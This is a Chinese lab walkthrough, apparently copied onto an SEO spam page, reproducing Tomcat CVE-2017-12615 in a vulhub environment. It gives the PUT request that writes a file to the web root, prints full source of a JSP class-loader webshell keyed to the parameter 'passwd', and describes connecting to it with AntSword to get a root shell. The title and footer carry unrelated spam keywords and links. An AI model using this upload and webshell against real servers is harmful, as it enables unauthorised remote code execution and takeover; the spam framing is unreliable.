当前位置: 首页 > news >正文

婚纱摄影照片快手seo

婚纱摄影照片,快手seo,天元建设集团有限公司企业号,自己创建的网站怎么做流量Tomcat 任意写文件PUT方法 (CVE-2017-12615) 文章目录 Tomcat 任意写文件PUT方法 (CVE-2017-12615)1 在线漏洞解读:2 版本影响3 环境搭建4 漏洞复现4.1 访问4.2 POC攻击点4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。4.2.2 访问是否通,可以访…

Tomcat 任意写文件PUT方法 (CVE-2017-12615)

文章目录

    • Tomcat 任意写文件PUT方法 (CVE-2017-12615)
      • 1 在线漏洞解读:
      • 2 版本影响
      • 3 环境搭建
      • 4 漏洞复现
        • 4.1 访问
        • 4.2 POC攻击点
          • 4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
          • 4.2.2 访问是否通,可以访问到文件
      • 5 漏洞利用
        • 5.1 上传jsp一句话
        • 5.2 kali打开蚁剑:
        • 5.3 连接jsp一句话木马,密码为 passwd
        • 5.4 打开终端,获取root

1 在线漏洞解读:

https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

在这里插入图片描述

2 版本影响

​ Tomcat version: 8.5.19

3 环境搭建

cd /home/kali/vulhub/tomcat/CVE-2017-12615

在这里插入图片描述

环境启动:

sudo docker-compose up -dsudo docker ps -a

已启动:访问端口8091

在这里插入图片描述

4 漏洞复现

4.1 访问

​ 4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面,发现8.5.19版本后台管理是不允许登录的

在这里插入图片描述
在这里插入图片描述

4.2 POC攻击点
4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell
4.2.2 访问是否通,可以访问到文件

在这里插入图片描述

5 漏洞利用

5.1 上传jsp一句话
<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>
5.2 kali打开蚁剑:
┌──(kali💋kali)-[~]
└─$ sudo antsword 
5.3 连接jsp一句话木马,密码为 passwd

在这里插入图片描述

5.4 打开终端,获取root

在这里插入图片描述

http://www.15wanjia.com/news/35533.html

相关文章:

  • 帮忙做ppt赚钱的网站济南seo网站排名优化工具
  • 网站监控怎么做移动营销
  • 卖老石器老榆木做哪个网站好个人seo外包
  • 二级域名怎么做网站备案交换链接适用于哪些网站
  • 昆山建设招标信息网站网盟推广是什么意思
  • 做展览的网站网站seo策划
  • 在哪些网站做收录比较快seo零基础培训
  • dw如何做网页广州网站优化软件
  • asp 网站数据库连接错误深圳推广服务
  • 济南网站备案流程百度做推广一般要多少钱
  • 专注赣州网站建设seo发包软件
  • 亚泰润德建设有限公司网站正规代运营公司排名
  • 课程网站设计建设seo排名官网
  • 建站工具免费seo自动刷外链工具
  • 提供网站建设服务搜索引擎关键词seo优化公司
  • 利用网站宣传 两学一做重庆二级站seo整站优化排名
  • 公司网站一般找哪个公司做世界营销大师排名
  • 易思企业网站破解版网址seo分析
  • 上海网站建设内容更新怎么在网上做网络营销
  • 网站跳转至手机端如何做南京seo排名优化
  • .net制作网站开发教程湖北seo服务
  • 上海专业网站建设精英域名注册服务机构
  • 免费的网站加速器福州百度网站排名优化
  • wordpress 底部链接文明seo技术教程网
  • 怎么做室内设计公司网站5月疫情第二波爆发
  • php网站开发步骤网站秒收录
  • 响应式网站wordpress摄影网站怎么建设
  • 电脑在哪网站接做扇子单品牌seo主要做什么
  • 网站域名重定向有什么平台可以推广
  • 新疆交通建设管理局项目执行一处网站百度账号官网